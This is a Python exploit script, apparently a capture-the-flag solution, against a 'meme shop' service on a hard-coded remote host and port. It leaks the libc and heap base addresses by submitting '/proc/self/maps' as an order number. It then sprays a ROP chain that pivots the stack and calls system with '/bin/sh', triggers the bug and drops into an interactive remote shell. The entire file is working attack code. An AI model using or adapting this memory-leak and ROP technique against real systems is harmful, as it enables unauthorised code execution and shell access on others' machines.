memeshop.py

#!/usr/bin/python

from Pwn import *
import re

def add_skeleton(skeleton):
	d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
	p.write('m\n')

	p.read_until('so... what do you say to mr skeletal?\n')
	p.write(skeleton.encode('base64'))
	r = p.read_until('im going to steal all ur calcuims')

	if 'im going to steal all ur calcuims' in r:
		return True
	return False

def add_meme():
	p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
	p.write('n\n')

def getBaseAddress():
	pl = '/proc/self/maps'.encode('base64')
	p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
	p.write('p\n')

	p.read_until('ok, let me know your order number bro:')
	p.write(pl)

	leak = p.read_until('rint receipt from confirmation number')

	match = re.findall(r'([0-9a-f]*\-[0-9a-f]*)',leak)
	heap_base = int(match[10].split('-')[0],16)
	libc_base = int(match[199].split('-')[0],16)
	return libc_base,heap_base

# 0x00000000000b25d5 : add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
# 0x0000000000022b1a : pop rdi ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret

def exploit():
	# start_offset = 0x10
	global p
	start = 233930608
	p = Pwn(mode=1,host='52.3.190.202',port=1337)
	# p = Pwn(mode=1,port=8888)
	p.connect()
	# raw_input('> ')
	libc_base,heap_base = getBaseAddress()
	print '[+] Libc base:',hex(libc_base)
	print '[+] Heap base:',hex(heap_base)
	# print '[!!!!] Offset',start
	# addr = int(raw_input('> '),16)
	pl = ''
	pl+= pA([
		libc_base + 0x1f7a6, # pop rdi ; pop rbp ; ret - skip me when stack is changed
		libc_base + 0xb25d5, # add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
		heap_base + start, # don't care
		libc_base + 0x22b1a, # pop rdi ; ret
		libc_base + 0x17ccdb, # "/bin/sh"
		libc_base + 0x46640 # system
	])
	pl+='C'*(280 - len(pl))

	add_meme()
	for i in xrange(256):
		print 'Add skeleton',(i+1)
		if not add_skeleton(pl):
			print 'Failed'
			return 1

	p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
	p.write('c\n') # trigger bug

	p.io()
	# start_offset+=280

exploit()